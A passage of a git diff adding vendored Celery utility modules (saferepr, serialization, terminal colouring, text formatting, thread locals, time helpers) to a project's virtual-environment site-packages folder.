+    if isinstance(val, bytes):  # pragma: no cover
+        return _format_binary_bytes(val, maxlen)
+    else:
+        return "'{}'".format(truncate(val, maxlen).replace("'", "\\'"))
+
+
+def _repr(obj):
+    # type: (Any) -> str
+    try:
+        return repr(obj)
+    except Exception as exc:
+        stack = '\n'.join(traceback.format_stack())
+        return f'<Unrepresentable {type(obj)!r}{id(obj):#x}: {exc!r} {stack!r}>'
+
+
+def _saferepr(o, maxlen=None, maxlevels=3, seen=None):
+    # type: (Any, int, int, Set) -> str
+    stack = deque([iter([o])])
+    for token, it in reprstream(stack, seen=seen, maxlevels=maxlevels):
+        if maxlen is not None and maxlen <= 0:
+            yield ', ...'
+            # move rest back to stack, so that we can include
+            # dangling parens.
+            stack.append(it)
+            break
+        if isinstance(token, _literal):
+            val = token.value
+        elif isinstance(token, _key):
+            val = saferepr(token.value, maxlen, maxlevels)
+        elif isinstance(token, _quoted):
+            val = _format_chars(token.value, maxlen)
+        else:
+            val = _safetext(truncate(token, maxlen))
+        yield val
+        if maxlen is not None:
+            maxlen -= len(val)
+    for rest1 in stack:
+        # maxlen exceeded, process any dangling parens.
+        for rest2 in rest1:
+            if isinstance(rest2, _literal) and not rest2.truncate:
+                yield rest2.value
+
+
+def _reprseq(val, lit_start, lit_end, builtin_type, chainer):
+    # type: (Sequence, _literal, _literal, Any, Any) -> Tuple[Any, ...]
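+    # Plain builtin containers reuse the bare start/end literals below;
+    # subclasses are instead rendered as ``ClassName([...])`` by embedding
+    # the type name into the start/end literal tokens.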
+ if type(val) is builtin_type: + return lit_start, lit_end, chainer(val) + return ( + _literal(f'{type(val).__name__}({lit_start.value}', False, +1), + _literal(f'{lit_end.value})', False, -1), + chainer(val) + ) + + +def reprstream(stack, seen=None, maxlevels=3, level=0, isinstance=isinstance): + """Streaming repr, yielding tokens.""" + # type: (deque, Set, int, int, Callable) -> Iterator[Any] + seen = seen or set() + append = stack.append + popleft = stack.popleft + is_in_seen = seen.__contains__ + discard_from_seen = seen.discard + add_to_seen = seen.add + + while stack: + lit_start = lit_end = None + it = popleft() + for val in it: + orig = val + if isinstance(val, _dirty): + discard_from_seen(val.objid) + continue + elif isinstance(val, _literal): + level += val.direction + yield val, it + elif isinstance(val, _key): + yield val, it + elif isinstance(val, Decimal): + yield _repr(val), it + elif isinstance(val, safe_t): + yield str(val), it + elif isinstance(val, chars_t): + yield _quoted(val), it + elif isinstance(val, range): # pragma: no cover + yield _repr(val), it + else: + if isinstance(val, set_t): + if not val: + yield _repr_empty_set(val), it + continue + lit_start, lit_end, val = _reprseq( + val, LIT_SET_START, LIT_SET_END, set, _chainlist, + ) + elif isinstance(val, tuple): + lit_start, lit_end, val = ( + LIT_TUPLE_START, + LIT_TUPLE_END_SV if len(val) == 1 else LIT_TUPLE_END, + _chainlist(val)) + elif isinstance(val, dict): + lit_start, lit_end, val = ( + LIT_DICT_START, LIT_DICT_END, _chaindict(val)) + elif isinstance(val, list): + lit_start, lit_end, val = ( + LIT_LIST_START, LIT_LIST_END, _chainlist(val)) + else: + # other type of object + yield _repr(val), it + continue + + if maxlevels and level >= maxlevels: + yield f'{lit_start.value}...{lit_end.value}', it + continue + + objid = id(orig) + if is_in_seen(objid): + yield _recursion(orig), it + continue + add_to_seen(objid) + + # Recurse into the new list/tuple/dict/etc by tacking + # the rest of our iterable onto the new it: this way + # it works similar to a linked list. + append(chain([lit_start], val, [_dirty(objid), lit_end], it)) + break diff --git a/env/Lib/site-packages/celery/utils/serialization.py b/env/Lib/site-packages/celery/utils/serialization.py new file mode 100644 index 00000000..6c6b3b76 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/serialization.py @@ -0,0 +1,273 @@ +"""Utilities for safely pickling exceptions.""" +import datetime +import numbers +import sys +from base64 import b64decode as base64decode +from base64 import b64encode as base64encode +from functools import partial +from inspect import getmro +from itertools import takewhile + +from kombu.utils.encoding import bytes_to_str, safe_repr, str_to_bytes + +try: + import cPickle as pickle +except ImportError: + import pickle + +__all__ = ( + 'UnpickleableExceptionWrapper', 'subclass_exception', + 'find_pickleable_exception', 'create_exception_cls', + 'get_pickleable_exception', 'get_pickleable_etype', + 'get_pickled_exception', 'strtobool', +) + +#: List of base classes we probably don't want to reduce to. 
+unwanted_base_classes = (Exception, BaseException, object) + +STRTOBOOL_DEFAULT_TABLE = {'false': False, 'no': False, '0': False, + 'true': True, 'yes': True, '1': True, + 'on': True, 'off': False} + + +def subclass_exception(name, parent, module): + """Create new exception class.""" + return type(name, (parent,), {'__module__': module}) + + +def find_pickleable_exception(exc, loads=pickle.loads, + dumps=pickle.dumps): + """Find first pickleable exception base class. + + With an exception instance, iterate over its super classes (by MRO) + and find the first super exception that's pickleable. It does + not go below :exc:`Exception` (i.e., it skips :exc:`Exception`, + :class:`BaseException` and :class:`object`). If that happens + you should use :exc:`UnpickleableException` instead. + + Arguments: + exc (BaseException): An exception instance. + loads: decoder to use. + dumps: encoder to use + + Returns: + Exception: Nearest pickleable parent exception class + (except :exc:`Exception` and parents), or if the exception is + pickleable it will return :const:`None`. + """ + exc_args = getattr(exc, 'args', []) + for supercls in itermro(exc.__class__, unwanted_base_classes): + try: + superexc = supercls(*exc_args) + loads(dumps(superexc)) + except Exception: # pylint: disable=broad-except + pass + else: + return superexc + + +def itermro(cls, stop): + return takewhile(lambda sup: sup not in stop, getmro(cls)) + + +def create_exception_cls(name, module, parent=None): + """Dynamically create an exception class.""" + if not parent: + parent = Exception + return subclass_exception(name, parent, module) + + +def ensure_serializable(items, encoder): + """Ensure items will serialize. + + For a given list of arbitrary objects, return the object + or a string representation, safe for serialization. + + Arguments: + items (Iterable[Any]): Objects to serialize. + encoder (Callable): Callable function to serialize with. + """ + safe_exc_args = [] + for arg in items: + try: + encoder(arg) + safe_exc_args.append(arg) + except Exception: # pylint: disable=broad-except + safe_exc_args.append(safe_repr(arg)) + return tuple(safe_exc_args) + + +class UnpickleableExceptionWrapper(Exception): + """Wraps unpickleable exceptions. + + Arguments: + exc_module (str): See :attr:`exc_module`. + exc_cls_name (str): See :attr:`exc_cls_name`. + exc_args (Tuple[Any, ...]): See :attr:`exc_args`. + + Example: + >>> def pickle_it(raising_function): + ... try: + ... raising_function() + ... except Exception as e: + ... exc = UnpickleableExceptionWrapper( + ... e.__class__.__module__, + ... e.__class__.__name__, + ... e.args, + ... ) + ... pickle.dumps(exc) # Works fine. + """ + + #: The module of the original exception. + exc_module = None + + #: The name of the original exception class. + exc_cls_name = None + + #: The arguments for the original exception. 
+ exc_args = None + + def __init__(self, exc_module, exc_cls_name, exc_args, text=None): + safe_exc_args = ensure_serializable( + exc_args, lambda v: pickle.loads(pickle.dumps(v)) + ) + self.exc_module = exc_module + self.exc_cls_name = exc_cls_name + self.exc_args = safe_exc_args + self.text = text + super().__init__(exc_module, exc_cls_name, safe_exc_args, + text) + + def restore(self): + return create_exception_cls(self.exc_cls_name, + self.exc_module)(*self.exc_args) + + def __str__(self): + return self.text + + @classmethod + def from_exception(cls, exc): + res = cls( + exc.__class__.__module__, + exc.__class__.__name__, + getattr(exc, 'args', []), + safe_repr(exc) + ) + if hasattr(exc, "__traceback__"): + res = res.with_traceback(exc.__traceback__) + return res + + +def get_pickleable_exception(exc): + """Make sure exception is pickleable.""" + try: + pickle.loads(pickle.dumps(exc)) + except Exception: # pylint: disable=broad-except + pass + else: + return exc + nearest = find_pickleable_exception(exc) + if nearest: + return nearest + return UnpickleableExceptionWrapper.from_exception(exc) + + +def get_pickleable_etype(cls, loads=pickle.loads, dumps=pickle.dumps): + """Get pickleable exception type.""" + try: + loads(dumps(cls)) + except Exception: # pylint: disable=broad-except + return Exception + else: + return cls + + +def get_pickled_exception(exc): + """Reverse of :meth:`get_pickleable_exception`.""" + if isinstance(exc, UnpickleableExceptionWrapper): + return exc.restore() + return exc + + +def b64encode(s): + return bytes_to_str(base64encode(str_to_bytes(s))) + + +def b64decode(s): + return base64decode(str_to_bytes(s)) + + +def strtobool(term, table=None): + """Convert common terms for true/false to bool. + + Examples (true/false/yes/no/on/off/1/0). + """ + if table is None: + table = STRTOBOOL_DEFAULT_TABLE + if isinstance(term, str): + try: + return table[term.lower()] + except KeyError: + raise TypeError(f'Cannot coerce {term!r} to type bool') + return term + + +def _datetime_to_json(dt): + # See "Date Time String Format" in the ECMA-262 specification. 
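+    # datetimes and times are serialized via isoformat() with microseconds
+    # truncated to milliseconds; a trailing '+00:00' offset is shortened to
+    # 'Z', and plain dates fall through to their default isoformat().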
+ if isinstance(dt, datetime.datetime): + r = dt.isoformat() + if dt.microsecond: + r = r[:23] + r[26:] + if r.endswith('+00:00'): + r = r[:-6] + 'Z' + return r + elif isinstance(dt, datetime.time): + r = dt.isoformat() + if dt.microsecond: + r = r[:12] + return r + else: + return dt.isoformat() + + +def jsonify(obj, + builtin_types=(numbers.Real, str), key=None, + keyfilter=None, + unknown_type_filter=None): + """Transform object making it suitable for json serialization.""" + from kombu.abstract import Object as KombuDictType + _jsonify = partial(jsonify, builtin_types=builtin_types, key=key, + keyfilter=keyfilter, + unknown_type_filter=unknown_type_filter) + + if isinstance(obj, KombuDictType): + obj = obj.as_dict(recurse=True) + + if obj is None or isinstance(obj, builtin_types): + return obj + elif isinstance(obj, (tuple, list)): + return [_jsonify(v) for v in obj] + elif isinstance(obj, dict): + return { + k: _jsonify(v, key=k) for k, v in obj.items() + if (keyfilter(k) if keyfilter else 1) + } + elif isinstance(obj, (datetime.date, datetime.time)): + return _datetime_to_json(obj) + elif isinstance(obj, datetime.timedelta): + return str(obj) + else: + if unknown_type_filter is None: + raise ValueError( + f'Unsupported type: {type(obj)!r} {obj!r} (parent: {key})' + ) + return unknown_type_filter(obj) + + +def raise_with_context(exc): + exc_info = sys.exc_info() + if not exc_info: + raise exc + elif exc_info[1] is exc: + raise + raise exc from exc_info[1] diff --git a/env/Lib/site-packages/celery/utils/static/__init__.py b/env/Lib/site-packages/celery/utils/static/__init__.py new file mode 100644 index 00000000..5051e5a0 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/static/__init__.py @@ -0,0 +1,14 @@ +"""Static files.""" +import os + + +def get_file(*args): + # type: (*str) -> str + """Get filename for static file.""" + return os.path.join(os.path.abspath(os.path.dirname(__file__)), *args) + + +def logo(): + # type: () -> bytes + """Celery logo image.""" + return get_file('celery_128.png') diff --git a/env/Lib/site-packages/celery/utils/static/celery_128.png b/env/Lib/site-packages/celery/utils/static/celery_128.png new file mode 100644 index 00000000..c3ff2d13 Binary files /dev/null and b/env/Lib/site-packages/celery/utils/static/celery_128.png differ diff --git a/env/Lib/site-packages/celery/utils/sysinfo.py b/env/Lib/site-packages/celery/utils/sysinfo.py new file mode 100644 index 00000000..57425dd8 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/sysinfo.py @@ -0,0 +1,48 @@ +"""System information utilities.""" +import os +from math import ceil + +from kombu.utils.objects import cached_property + +__all__ = ('load_average', 'df') + + +if hasattr(os, 'getloadavg'): + + def _load_average(): + return tuple(ceil(l * 1e2) / 1e2 for l in os.getloadavg()) + +else: # pragma: no cover + # Windows doesn't have getloadavg + def _load_average(): + return (0.0, 0.0, 0.0) + + +def load_average(): + """Return system load average as a triple.""" + return _load_average() + + +class df: + """Disk information.""" + + def __init__(self, path): + self.path = path + + @property + def total_blocks(self): + return self.stat.f_blocks * self.stat.f_frsize / 1024 + + @property + def available(self): + return self.stat.f_bavail * self.stat.f_frsize / 1024 + + @property + def capacity(self): + avail = self.stat.f_bavail + used = self.stat.f_blocks - self.stat.f_bfree + return int(ceil(used * 100.0 / (used + avail) + 0.5)) + + @cached_property + def stat(self): + return 
os.statvfs(os.path.abspath(self.path)) diff --git a/env/Lib/site-packages/celery/utils/term.py b/env/Lib/site-packages/celery/utils/term.py new file mode 100644 index 00000000..a2eff996 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/term.py @@ -0,0 +1,177 @@ +"""Terminals and colors.""" +import base64 +import codecs +import os +import platform +import sys +from functools import reduce + +__all__ = ('colored',) + +BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) +OP_SEQ = '\033[%dm' +RESET_SEQ = '\033[0m' +COLOR_SEQ = '\033[1;%dm' + +IS_WINDOWS = platform.system() == 'Windows' + +ITERM_PROFILE = os.environ.get('ITERM_PROFILE') +TERM = os.environ.get('TERM') +TERM_IS_SCREEN = TERM and TERM.startswith('screen') + +# tmux requires unrecognized OSC sequences to be wrapped with DCS tmux; +# ST, and for all ESCs in to be replaced with ESC ESC. +# It only accepts ESC backslash for ST. +_IMG_PRE = '\033Ptmux;\033\033]' if TERM_IS_SCREEN else '\033]' +_IMG_POST = '\a\033\\' if TERM_IS_SCREEN else '\a' + + +def fg(s): + return COLOR_SEQ % s + + +class colored: + """Terminal colored text. + + Example: + >>> c = colored(enabled=True) + >>> print(str(c.red('the quick '), c.blue('brown ', c.bold('fox ')), + ... c.magenta(c.underline('jumps over')), + ... c.yellow(' the lazy '), + ... c.green('dog '))) + """ + + def __init__(self, *s, **kwargs): + self.s = s + self.enabled = not IS_WINDOWS and kwargs.get('enabled', True) + self.op = kwargs.get('op', '') + self.names = { + 'black': self.black, + 'red': self.red, + 'green': self.green, + 'yellow': self.yellow, + 'blue': self.blue, + 'magenta': self.magenta, + 'cyan': self.cyan, + 'white': self.white, + } + + def _add(self, a, b): + return str(a) + str(b) + + def _fold_no_color(self, a, b): + try: + A = a.no_color() + except AttributeError: + A = str(a) + try: + B = b.no_color() + except AttributeError: + B = str(b) + + return ''.join((str(A), str(B))) + + def no_color(self): + if self.s: + return str(reduce(self._fold_no_color, self.s)) + return '' + + def embed(self): + prefix = '' + if self.enabled: + prefix = self.op + return ''.join((str(prefix), str(reduce(self._add, self.s)))) + + def __str__(self): + suffix = '' + if self.enabled: + suffix = RESET_SEQ + return str(''.join((self.embed(), str(suffix)))) + + def node(self, s, op): + return self.__class__(enabled=self.enabled, op=op, *s) + + def black(self, *s): + return self.node(s, fg(30 + BLACK)) + + def red(self, *s): + return self.node(s, fg(30 + RED)) + + def green(self, *s): + return self.node(s, fg(30 + GREEN)) + + def yellow(self, *s): + return self.node(s, fg(30 + YELLOW)) + + def blue(self, *s): + return self.node(s, fg(30 + BLUE)) + + def magenta(self, *s): + return self.node(s, fg(30 + MAGENTA)) + + def cyan(self, *s): + return self.node(s, fg(30 + CYAN)) + + def white(self, *s): + return self.node(s, fg(30 + WHITE)) + + def __repr__(self): + return repr(self.no_color()) + + def bold(self, *s): + return self.node(s, OP_SEQ % 1) + + def underline(self, *s): + return self.node(s, OP_SEQ % 4) + + def blink(self, *s): + return self.node(s, OP_SEQ % 5) + + def reverse(self, *s): + return self.node(s, OP_SEQ % 7) + + def bright(self, *s): + return self.node(s, OP_SEQ % 8) + + def ired(self, *s): + return self.node(s, fg(40 + RED)) + + def igreen(self, *s): + return self.node(s, fg(40 + GREEN)) + + def iyellow(self, *s): + return self.node(s, fg(40 + YELLOW)) + + def iblue(self, *s): + return self.node(s, fg(40 + BLUE)) + + def imagenta(self, *s): + return self.node(s, fg(40 
+ MAGENTA)) + + def icyan(self, *s): + return self.node(s, fg(40 + CYAN)) + + def iwhite(self, *s): + return self.node(s, fg(40 + WHITE)) + + def reset(self, *s): + return self.node(s or [''], RESET_SEQ) + + def __add__(self, other): + return str(self) + str(other) + + +def supports_images(): + return sys.stdin.isatty() and ITERM_PROFILE + + +def _read_as_base64(path): + with codecs.open(path, mode='rb') as fh: + encoded = base64.b64encode(fh.read()) + return encoded if isinstance(encoded, str) else encoded.decode('ascii') + + +def imgcat(path, inline=1, preserve_aspect_ratio=0, **kwargs): + return '\n%s1337;File=inline=%d;preserveAspectRatio=%d:%s%s' % ( + _IMG_PRE, inline, preserve_aspect_ratio, + _read_as_base64(path), _IMG_POST) diff --git a/env/Lib/site-packages/celery/utils/text.py b/env/Lib/site-packages/celery/utils/text.py new file mode 100644 index 00000000..9d18a735 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/text.py @@ -0,0 +1,198 @@ +"""Text formatting utilities.""" +from __future__ import annotations + +import io +import re +from functools import partial +from pprint import pformat +from re import Match +from textwrap import fill +from typing import Any, Callable, Pattern + +__all__ = ( + 'abbr', 'abbrtask', 'dedent', 'dedent_initial', + 'ensure_newlines', 'ensure_sep', + 'fill_paragraphs', 'indent', 'join', + 'pluralize', 'pretty', 'str_to_list', 'simple_format', 'truncate', +) + +UNKNOWN_SIMPLE_FORMAT_KEY = """ +Unknown format %{0} in string {1!r}. +Possible causes: Did you forget to escape the expand sign (use '%%{0!r}'), +or did you escape and the value was expanded twice? (%%N -> %N -> %hostname)? +""".strip() + +RE_FORMAT = re.compile(r'%(\w)') + + +def str_to_list(s: str) -> list[str]: + """Convert string to list.""" + if isinstance(s, str): + return s.split(',') + return s + + +def dedent_initial(s: str, n: int = 4) -> str: + """Remove indentation from first line of text.""" + return s[n:] if s[:n] == ' ' * n else s + + +def dedent(s: str, sep: str = '\n') -> str: + """Remove indentation.""" + return sep.join(dedent_initial(l) for l in s.splitlines()) + + +def fill_paragraphs(s: str, width: int, sep: str = '\n') -> str: + """Fill paragraphs with newlines (or custom separator).""" + return sep.join(fill(p, width) for p in s.split(sep)) + + +def join(l: list[str], sep: str = '\n') -> str: + """Concatenate list of strings.""" + return sep.join(v for v in l if v) + + +def ensure_sep(sep: str, s: str, n: int = 2) -> str: + """Ensure text s ends in separator sep'.""" + return s + sep * (n - s.count(sep)) + + +ensure_newlines = partial(ensure_sep, '\n') + + +def abbr(S: str, max: int, ellipsis: str | bool = '...') -> str: + """Abbreviate word.""" + if S is None: + return '???' + if len(S) > max: + return isinstance(ellipsis, str) and ( + S[: max - len(ellipsis)] + ellipsis) or S[: max] + return S + + +def abbrtask(S: str, max: int) -> str: + """Abbreviate task name.""" + if S is None: + return '???' 
+ if len(S) > max: + module, _, cls = S.rpartition('.') + module = abbr(module, max - len(cls) - 3, False) + return module + '[.]' + cls + return S + + +def indent(t: str, indent: int = 0, sep: str = '\n') -> str: + """Indent text.""" + return sep.join(' ' * indent + p for p in t.split(sep)) + + +def truncate(s: str, maxlen: int = 128, suffix: str = '...') -> str: + """Truncate text to a maximum number of characters.""" + if maxlen and len(s) >= maxlen: + return s[:maxlen].rsplit(' ', 1)[0] + suffix + return s + + +def pluralize(n: float, text: str, suffix: str = 's') -> str: + """Pluralize term when n is greater than one.""" + if n != 1: + return text + suffix + return text + + +def pretty(value: str, width: int = 80, nl_width: int = 80, sep: str = '\n', ** + kw: Any) -> str: + """Format value for printing to console.""" + if isinstance(value, dict): + return f'{sep} {pformat(value, 4, nl_width)[1:]}' + elif isinstance(value, tuple): + return '{}{}{}'.format( + sep, ' ' * 4, pformat(value, width=nl_width, **kw), + ) + else: + return pformat(value, width=width, **kw) + + +def match_case(s: str, other: str) -> str: + return s.upper() if other.isupper() else s.lower() + + +def simple_format( + s: str, keys: dict[str, str | Callable], + pattern: Pattern[str] = RE_FORMAT, expand: str = r'\1') -> str: + """Format string, expanding abbreviations in keys'.""" + if s: + keys.setdefault('%', '%') + + def resolve(match: Match) -> str | Any: + key = match.expand(expand) + try: + resolver = keys[key] + except KeyError: + raise ValueError(UNKNOWN_SIMPLE_FORMAT_KEY.format(key, s)) + if callable(resolver): + return resolver() + return resolver + + return pattern.sub(resolve, s) + return s + + +def remove_repeating_from_task(task_name: str, s: str) -> str: + """Given task name, remove repeating module names. + + Example: + >>> remove_repeating_from_task( + ... 'tasks.add', + ... 'tasks.add(2, 2), tasks.mul(3), tasks.div(4)') + 'tasks.add(2, 2), mul(3), div(4)' + """ + # This is used by e.g. repr(chain), to remove repeating module names. + # - extract the module part of the task name + module = str(task_name).rpartition('.')[0] + '.' + return remove_repeating(module, s) + + +def remove_repeating(substr: str, s: str) -> str: + """Remove repeating module names from string. + + Arguments: + task_name (str): Task name (full path including module), + to use as the basis for removing module names. + s (str): The string we want to work on. + + Example: + + >>> _shorten_names( + ... 'x.tasks.add', + ... 'x.tasks.add(2, 2) | x.tasks.add(4) | x.tasks.mul(8)', + ... ) + 'x.tasks.add(2, 2) | add(4) | mul(8)' + """ + # find the first occurrence of substr in the string. + index = s.find(substr) + if index >= 0: + return ''.join([ + # leave the first occurrence of substr untouched. + s[:index + len(substr)], + # strip seen substr from the rest of the string. 
+ s[index + len(substr):].replace(substr, ''), + ]) + return s + + +StringIO = io.StringIO +_SIO_write = StringIO.write +_SIO_init = StringIO.__init__ + + +class WhateverIO(StringIO): + """StringIO that takes bytes or str.""" + + def __init__( + self, v: bytes | str | None = None, *a: Any, **kw: Any) -> None: + _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw) + + def write(self, data: bytes | str) -> int: + return _SIO_write(self, data.decode() + if isinstance(data, bytes) else data) diff --git a/env/Lib/site-packages/celery/utils/threads.py b/env/Lib/site-packages/celery/utils/threads.py new file mode 100644 index 00000000..d78461a9 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/threads.py @@ -0,0 +1,331 @@ +"""Threading primitives and utilities.""" +import os +import socket +import sys +import threading +import traceback +from contextlib import contextmanager +from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX + +from celery.local import Proxy + +try: + from greenlet import getcurrent as get_ident +except ImportError: + try: + from _thread import get_ident + except ImportError: + try: + from thread import get_ident + except ImportError: + try: + from _dummy_thread import get_ident + except ImportError: + from dummy_thread import get_ident + + +__all__ = ( + 'bgThread', 'Local', 'LocalStack', 'LocalManager', + 'get_ident', 'default_socket_timeout', +) + +USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS') + + +@contextmanager +def default_socket_timeout(timeout): + """Context temporarily setting the default socket timeout.""" + prev = socket.getdefaulttimeout() + socket.setdefaulttimeout(timeout) + yield + socket.setdefaulttimeout(prev) + + +class bgThread(threading.Thread): + """Background service thread.""" + + def __init__(self, name=None, **kwargs): + super().__init__() + self.__is_shutdown = threading.Event() + self.__is_stopped = threading.Event() + self.daemon = True + self.name = name or self.__class__.__name__ + + def body(self): + raise NotImplementedError() + + def on_crash(self, msg, *fmt, **kwargs): + print(msg.format(*fmt), file=sys.stderr) + traceback.print_exc(None, sys.stderr) + + def run(self): + body = self.body + shutdown_set = self.__is_shutdown.is_set + try: + while not shutdown_set(): + try: + body() + except Exception as exc: # pylint: disable=broad-except + try: + self.on_crash('{0!r} crashed: {1!r}', self.name, exc) + self._set_stopped() + finally: + sys.stderr.flush() + os._exit(1) # exiting by normal means won't work + finally: + self._set_stopped() + + def _set_stopped(self): + try: + self.__is_stopped.set() + except TypeError: # pragma: no cover + # we lost the race at interpreter shutdown, + # so gc collected built-in modules. + pass + + def stop(self): + """Graceful shutdown.""" + self.__is_shutdown.set() + self.__is_stopped.wait() + if self.is_alive(): + self.join(THREAD_TIMEOUT_MAX) + + +def release_local(local): + """Release the contents of the local for the current context. + + This makes it possible to use locals without a manager. + + With this function one can release :class:`Local` objects as well as + :class:`StackLocal` objects. However it's not possible to + release data held by proxies that way, one always has to retain + a reference to the underlying local object in order to be able + to release it. 
+ + Example: + >>> loc = Local() + >>> loc.foo = 42 + >>> release_local(loc) + >>> hasattr(loc, 'foo') + False + """ + local.__release_local__() + + +class Local: + """Local object.""" + + __slots__ = ('__storage__', '__ident_func__') + + def __init__(self): + object.__setattr__(self, '__storage__', {}) + object.__setattr__(self, '__ident_func__', get_ident) + + def __iter__(self): + return iter(self.__storage__.items()) + + def __call__(self, proxy): + """Create a proxy for a name.""" + return Proxy(self, proxy) + + def __release_local__(self): + self.__storage__.pop(self.__ident_func__(), None) + + def __getattr__(self, name): + try: + return self.__storage__[self.__ident_func__()][name] + except KeyError: + raise AttributeError(name) + + def __setattr__(self, name, value): + ident = self.__ident_func__() + storage = self.__storage__ + try: + storage[ident][name] = value + except KeyError: + storage[ident] = {name: value} + + def __delattr__(self, name): + try: + del self.__storage__[self.__ident_func__()][name] + except KeyError: + raise AttributeError(name) + + +class _LocalStack: + """Local stack. + + This class works similar to a :class:`Local` but keeps a stack + of objects instead. This is best explained with an example:: + + >>> ls = LocalStack() + >>> ls.push(42) + >>> ls.top + 42 + >>> ls.push(23) + >>> ls.top + 23 + >>> ls.pop() + 23 + >>> ls.top + 42 + + They can be force released by using a :class:`LocalManager` or with + the :func:`release_local` function but the correct way is to pop the + item from the stack after using. When the stack is empty it will + no longer be bound to the current context (and as such released). + + By calling the stack without arguments it will return a proxy that + resolves to the topmost item on the stack. + """ + + def __init__(self): + self._local = Local() + + def __release_local__(self): + self._local.__release_local__() + + def _get__ident_func__(self): + return self._local.__ident_func__ + + def _set__ident_func__(self, value): + object.__setattr__(self._local, '__ident_func__', value) + __ident_func__ = property(_get__ident_func__, _set__ident_func__) + del _get__ident_func__, _set__ident_func__ + + def __call__(self): + def _lookup(): + rv = self.top + if rv is None: + raise RuntimeError('object unbound') + return rv + return Proxy(_lookup) + + def push(self, obj): + """Push a new item to the stack.""" + rv = getattr(self._local, 'stack', None) + if rv is None: + # pylint: disable=assigning-non-slot + # This attribute is defined now. + self._local.stack = rv = [] + rv.append(obj) + return rv + + def pop(self): + """Remove the topmost item from the stack. + + Note: + Will return the old value or `None` if the stack was already empty. + """ + stack = getattr(self._local, 'stack', None) + if stack is None: + return None + elif len(stack) == 1: + release_local(self._local) + return stack[-1] + else: + return stack.pop() + + def __len__(self): + stack = getattr(self._local, 'stack', None) + return len(stack) if stack else 0 + + @property + def stack(self): + # get_current_worker_task uses this to find + # the original task that was executed by the worker. + stack = getattr(self._local, 'stack', None) + if stack is not None: + return stack + return [] + + @property + def top(self): + """The topmost item on the stack. + + Note: + If the stack is empty, :const:`None` is returned. + """ + try: + return self._local.stack[-1] + except (AttributeError, IndexError): + return None + + +class LocalManager: + """Local objects cannot manage themselves. 
+ + For that you need a local manager. + You can pass a local manager multiple locals or add them + later by appending them to ``manager.locals``. Every time the manager + cleans up, it will clean up all the data left in the locals for this + context. + + The ``ident_func`` parameter can be added to override the default ident + function for the wrapped locals. + """ + + def __init__(self, locals=None, ident_func=None): + if locals is None: + self.locals = [] + elif isinstance(locals, Local): + self.locals = [locals] + else: + self.locals = list(locals) + if ident_func is not None: + self.ident_func = ident_func + for local in self.locals: + object.__setattr__(local, '__ident_func__', ident_func) + else: + self.ident_func = get_ident + + def get_ident(self): + """Return context identifier. + + This is the identifier the local objects use internally + for this context. You cannot override this method to change the + behavior but use it to link other context local objects (such as + SQLAlchemy's scoped sessions) to the Werkzeug locals. + """ + return self.ident_func() + + def cleanup(self): + """Manually clean up the data in the locals for this context. + + Call this at the end of the request or use ``make_middleware()``. + """ + for local in self.locals: + release_local(local) + + def __repr__(self): + return '<{} storages: {}>'.format( + self.__class__.__name__, len(self.locals)) + + +class _FastLocalStack(threading.local): + + def __init__(self): + self.stack = [] + self.push = self.stack.append + self.pop = self.stack.pop + super().__init__() + + @property + def top(self): + try: + return self.stack[-1] + except (AttributeError, IndexError): + return None + + def __len__(self): + return len(self.stack) + + +if USE_FAST_LOCALS: # pragma: no cover + LocalStack = _FastLocalStack +else: # pragma: no cover + # - See #706 + # since each thread has its own greenlet we can just use those as + # identifiers for the context. If greenlets aren't available we + # fall back to the current thread ident. 
LocalStack = _LocalStack
diff --git a/env/Lib/site-packages/celery/utils/time.py b/env/Lib/site-packages/celery/utils/time.py
new file mode 100644
index 00000000..f5329a5e
--- /dev/null
+++ b/env/Lib/site-packages/celery/utils/time.py
@@ -0,0 +1,429 @@
+"""Utilities related to dates, times, intervals, and timezones."""
+from __future__ import annotations
+
+import numbers
+import os
+import random
+import sys
+import time as _time
+from calendar import monthrange
+from datetime import date, datetime, timedelta
+from datetime import timezone as datetime_timezone
+from datetime import tzinfo
+from types import ModuleType
+from typing import Any, Callable
+
+from dateutil import tz as dateutil_tz
+from kombu.utils.functional import reprcall
+from kombu.utils.objects import cached_property
+
+from .functional import dictfilter
+from .text import pluralize
+
+if sys.version_info >= (3, 9):
+    from zoneinfo import ZoneInfo
+else:
+    from backports.zoneinfo import ZoneInfo
+
+
+__all__ = (
+    'LocalTimezone', 'timezone', 'maybe_timedelta',
+    'delta_resolution', 'remaining', 'rate', 'weekday',
+    'humanize_seconds', 'maybe_iso8601', 'is_naive',
+    'make_aware', 'localize', 'to_utc', 'maybe_make_aware',
+    'ffwd', 'utcoffset', 'adjust_timestamp',
+    'get_exponential_backoff_interval',
+)
+
+C_REMDEBUG = os.environ.get('C_REMDEBUG', False)
+
+DAYNAMES = 'sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'
+WEEKDAYS = dict(zip(DAYNAMES, range(7)))
+
+RATE_MODIFIER_MAP = {
+    's': lambda n: n,
+    'm': lambda n: n / 60.0,
+    'h': lambda n: n / 60.0 / 60.0,
+}
+
+TIME_UNITS = (
+    ('day', 60 * 60 * 24.0, lambda n: format(n, '.2f')),
+    ('hour', 60 * 60.0, lambda n: format(n, '.2f')),
+    ('minute', 60.0, lambda n: format(n, '.2f')),
+    ('second', 1.0, lambda n: format(n, '.2f')),
+)
+
+ZERO = timedelta(0)
+
+_local_timezone = None
+
+
+class LocalTimezone(tzinfo):
+    """Local time implementation. Provided in _Zone to the app when `enable_utc` is disabled.
+    Otherwise, _Zone provides a UTC ZoneInfo instance as the timezone implementation for the application.
+
+    Note:
+        Used only when the :setting:`enable_utc` setting is disabled.
+    """
+
+    _offset_cache: dict[int, tzinfo] = {}
+
+    def __init__(self) -> None:
+        # This code is moved in __init__ to execute it as late as possible
+        # See get_default_timezone().
+        self.STDOFFSET = timedelta(seconds=-_time.timezone)
+        if _time.daylight:
+            self.DSTOFFSET = timedelta(seconds=-_time.altzone)
+        else:
+            self.DSTOFFSET = self.STDOFFSET
+        self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
+        super().__init__()
+
